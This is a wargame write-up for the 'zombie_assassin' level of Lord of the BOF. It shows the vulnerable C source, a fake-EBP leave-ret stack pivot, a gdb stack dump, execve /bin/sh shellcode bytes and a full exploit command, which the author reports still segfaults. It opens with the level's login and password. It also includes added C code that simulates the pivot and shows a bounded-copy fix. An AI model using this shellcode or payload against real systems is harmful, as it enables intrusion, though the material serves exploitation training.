login : assassin
pw : pushing me away
/*
The Lord of the BOF : The Fellowship of the BOF
- zombie_assassin
- FEBP
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strncpy */

int main(int argc, char *argv[])
{
    char buffer[40];

    if (argc < 2) {
        printf("argv error\n");
        exit(0);
    }

    /* byte 47 of argv[1] is the most significant byte of the overwritten return address */
    if (argv[1][47] == '\xbf') {            /* stack address */
        printf("stack retbayed you!\n");
        exit(0);
    }
    if (argv[1][47] == '\x40') {            /* library address */
        printf("library retbayed you, too!!\n");
        exit(0);
    }

    // strncpy instead of strcpy! (still copies 48 bytes into a 40-byte buffer)
    strncpy(buffer, argv[1], 48);
    printf("%s\n", buffer);
    return 0;
}
Compared with the previous level, strcpy has been replaced by strncpy.
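Why the switch to strncpy changes nothing here: the length argument is 48 while the buffer is 40 bytes, so the copy still reaches the saved EBP (bytes 40..43) and the return address (bytes 44..47), and the program's only defence is a check on byte 47 for the two prefixes 0xbf and 0x40. The following added example (not part of the write-up or the LOB binary) models that frame, shows what the byte-47 check does and does not reject, and puts a bounded, NUL-terminating copy beside it as the fix. The frame offsets are the usual 32-bit layout and are assumed, not read from the binary; the input string is constructed.

```c
#include <stdio.h>
#include <string.h>

/* Frame model for the challenge binary (buffer at ebp-0x28 per the disassembly
   on this page): 40 bytes of buffer, then the 4-byte saved EBP, then the 4-byte
   return address. The offsets are the usual 32-bit layout, assumed here. */
#define BUF_SIZE      40
#define SAVED_EBP_OFF 40
#define RET_OFF       44

enum reach { REACH_NONE = 0, REACH_SAVED_EBP = 1, REACH_RET = 2 };

/* Which saved slot a copy of copy_len bytes into the buffer reaches. */
enum reach overflow_reach(size_t copy_len)
{
    if (copy_len > RET_OFF)
        return REACH_RET;          /* bytes 44..47 land on the return address */
    if (copy_len > SAVED_EBP_OFF)
        return REACH_SAVED_EBP;    /* bytes 40..43 land on the saved EBP */
    return REACH_NONE;
}

/* The binary's own check: it inspects byte 47 only, i.e. the most significant
   byte of the little-endian return address, rejecting 0xbf (stack) and 0x40 (libc).
   A one-byte deny-list is not a mitigation; any other prefix passes. */
int ret_high_byte_rejected(unsigned char b)
{
    return b == 0xbf || b == 0x40;
}

/* Hardened copy: bounded by the destination size and always NUL-terminated.
   Returns 1 when the input was truncated so the caller can log or reject it. */
int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    size_t n = strlen(src);
    int truncated = (n >= dst_size);
    if (truncated)
        n = dst_size - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return truncated;
}

int main(void)
{
    char dst[BUF_SIZE];
    char src[64];
    memset(src, 'a', sizeof src - 1);   /* constructed 63-byte input */
    src[sizeof src - 1] = '\0';

    printf("strncpy(buffer, argv[1], 48) reaches slot %d (2 = return address)\n",
           overflow_reach(48));
    printf("0x08 (text segment) rejected by the byte-47 check? %d\n",
           ret_high_byte_rejected(0x08));
    printf("bounded_copy truncated: %d, stored %zu bytes\n",
           bounded_copy(dst, sizeof dst, src), strlen(dst));
    return 0;
}
```

The lesson for code review is the comparison `copy_len > sizeof buffer`, not the function name: `strncpy(buffer, argv[1], sizeof buffer - 1)` followed by explicit NUL termination is what the replacement should have been.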
Let's use a fake EBP.
Fake EBP
What is Fake EBP? Fake EBP is an attack technique that manipulates EBP and uses a leave-ret gadget to control the IP (instruction pointer). It is mainly used when RET cannot be overwritten with a stack address or a library address.
d4m0n.tistory.com
The payload is
&buf+4 (shellcode address) (4) + shellcode (25) + nop (11) + &buf-4 (4) + leave-ret gadget (4)
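To see why this layout works even though the return address itself has to pass the byte-47 check, the following added example (my own model, not code from the write-up or the LOB binary) simulates the two `leave; ret` sequences on a constructed 32-bit frame: main's epilogue loads the fake EBP from bytes 40..43 and returns to the gadget at 0x80484df, and the gadget then moves ESP to the fake EBP and returns to whatever sits at &buf, which the layout above makes &buf+4. The buffer address 0xbffffc74 is the one the page reads off the gdb dump; the 25 shellcode bytes are replaced by 0xCC marker bytes, and the 4 bytes below the buffer are modelled as zero.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of the overwritten frame. FRAME_BASE stands in for the
   "buf" address from the gdb dump; the fake EBP points 4 bytes below it, so
   the modelled memory starts at FRAME_BASE - 4. */
#define FRAME_BASE 0xbffffc74u
#define MEM_BASE   (FRAME_BASE - 4u)
#define MEM_LEN    52u           /* 4 bytes below the buffer + the 48-byte frame */
#define FRAME_OFF  4u            /* where the buffer starts inside mem[] */
#define GADGET     0x080484dfu   /* main's leave; ret from the disassembly above */
#define SHELL_MARK 0xCCu         /* marker in place of shellcode bytes (int3) */

typedef struct {
    uint32_t esp, ebp, eip;
    uint8_t  mem[MEM_LEN];
} cpu_t;

static uint32_t load32(const cpu_t *c, uint32_t addr)
{
    uint32_t o = addr - MEM_BASE;   /* little-endian 32-bit read */
    return (uint32_t)c->mem[o] | (uint32_t)c->mem[o + 1] << 8 |
           (uint32_t)c->mem[o + 2] << 16 | (uint32_t)c->mem[o + 3] << 24;
}

static void store32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;          p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16);  p[3] = (uint8_t)(v >> 24);
}

/* x86 "leave; ret": mov esp, ebp / pop ebp / pop eip */
static void leave_ret(cpu_t *c)
{
    c->esp = c->ebp;
    c->ebp = load32(c, c->esp); c->esp += 4;
    c->eip = load32(c, c->esp); c->esp += 4;
}

/* The page's layout inside the 48 bytes strncpy writes:
   [&buf+4][25 marker bytes][11 NOPs][&buf-4 as saved EBP][gadget as RET] */
void build_frame(cpu_t *c)
{
    uint8_t *f = c->mem + FRAME_OFF;
    memset(c->mem, 0, MEM_LEN);
    store32(f + 0, FRAME_BASE + 4);
    memset(f + 4, SHELL_MARK, 25);
    memset(f + 29, 0x90, 11);
    store32(f + 40, FRAME_BASE - 4);
    store32(f + 44, GADGET);
}

/* Start at main's own epilogue with the frame overwritten; return the address
   control reaches after the gadget has run. */
uint32_t simulate_pivot(cpu_t *c)
{
    build_frame(c);
    c->ebp = FRAME_BASE + 40;   /* main's ebp points at the saved-EBP slot */
    leave_ret(c);               /* main: ebp <- &buf-4, eip <- gadget */
    if (c->eip != GADGET)
        return c->eip;
    leave_ret(c);               /* gadget: esp <- &buf-4, pop ebp, ret pops *(&buf) = &buf+4 */
    return c->eip;
}

/* 1 if eip points into the marker region standing in for the shellcode. */
int eip_hits_marker(const cpu_t *c)
{
    uint32_t o = c->eip - MEM_BASE;
    return o < MEM_LEN && c->mem[o] == SHELL_MARK;
}

/* Byte i of the 48 copied bytes; byte 47 is the one the binary inspects. */
uint8_t frame_byte(const cpu_t *c, unsigned i)
{
    return c->mem[FRAME_OFF + i];
}

int main(void)
{
    cpu_t c;
    uint32_t eip = simulate_pivot(&c);
    printf("eip after both leave;ret sequences: 0x%08x (buf+4 = 0x%08x)\n",
           (unsigned)eip, (unsigned)(FRAME_BASE + 4));
    printf("byte 47 of the copied frame: 0x%02x (neither 0xbf nor 0x40)\n", frame_byte(&c, 47));
    printf("eip lands on the shellcode marker: %d\n", eip_hits_marker(&c));
    return 0;
}
```

The defender's reading of the simulation: byte 47 is 0x08 because the return address points into the program's own text, so the check passes, and control still ends up in attacker-supplied data through the saved frame pointer. Filtering single byte values of the return address does not remove the overflow; only bounding the copy does.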
Let's find each piece one at a time.
1. leave-ret address
0x80484ce <main+142>: lea 0xffffffd8(%ebp),%eax
0x80484d1 <main+145>: push %eax
0x80484d2 <main+146>: push $0x804857e
0x80484d7 <main+151>: call 0x8048354 <printf>
0x80484dc <main+156>: add $0x8,%esp
0x80484df <main+159>: leave
0x80484e0 <main+160>: ret
0x80484e1 <main+161>: nop
0x80484df
2. shellcode
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80
3. &buf+4
(gdb) r `python -c 'print "a"*44'`
Starting program: /home/assassin/test `python -c 'print "a"*44'`
Breakpoint 1, 0x8048440 in main ()
(gdb) x/100x $esp
0xbffffb2c: 0x400309cb 0x00000002 0xbffffb74 0xbffffb80
0xbffffb3c: 0x40013868 0x00000002 0x08048390 0x00000000
0xbffffb4c: 0x080483b1 0x08048440 0x00000002 0xbffffb74
0xbffffb5c: 0x080482e4 0x0804851c 0x4000ae60 0xbffffb6c
0xbffffb6c: 0x40013e90 0x00000002 0xbffffc5f 0xbffffc73
0xbffffb7c: 0x00000000 0xbffffca0 0xbffffcc2 0xbffffccc
0xbffffb8c: 0xbffffcda 0xbffffcf9 0xbffffd0a 0xbffffd23
0xbffffb9c: 0xbffffd41 0xbffffd4c 0xbffffd5a 0xbffffd9e
0xbffffbac: 0xbffffdb2 0xbffffdc7 0xbffffdd7 0xbffffde5
0xbffffbbc: 0xbffffe05 0xbffffe10 0xbffffe1d 0xbffffe25
0xbffffbcc: 0x00000000 0x00000003 0x08048034 0x00000004
0xbffffbdc: 0x00000020 0x00000005 0x00000006 0x00000006
0xbffffbec: 0x00001000 0x00000007 0x40000000 0x00000008
0xbffffbfc: 0x00000000 0x00000009 0x08048390 0x0000000b
0xbffffc0c: 0x00000203 0x0000000c 0x00000203 0x0000000d
0xbffffc1c: 0x00000203 0x0000000e 0x00000203 0x00000010
0xbffffc2c: 0x0f8bfbff 0x0000000f 0xbffffc5a 0x00000000
0xbffffc3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc4c: 0x00000000 0x00000000 0x00000000 0x36690000
0xbffffc5c: 0x2f003638 0x656d6f68 0x7373612f 0x69737361
0xbffffc6c: 0x65742f6e 0x61007473 0x61616161 0x61616161
0xbffffc7c: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffffc8c: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffffc9c: 0x00616161 0x5353454c 0x4e45504f 0x752f7c3d
buf + 4:
buf starts at 0xbffffc74, so adding 4 gives 0xbffffc78.
4. &buf-4
0xbffffc70.
0xbffffc78 + \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80
+ \x90 * 11
+ 0xbffffc70
+ 0x80484df
./zombie_assassin `python -c 'print "\x78\xfc\xff\xbf"+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x90"*11+"\x70\xfc\xff\xbf"+"\xdf\x84\x04\x08"'`
I keep getting a segmentation fault, so I will have to come back to this problem later.
no place to hide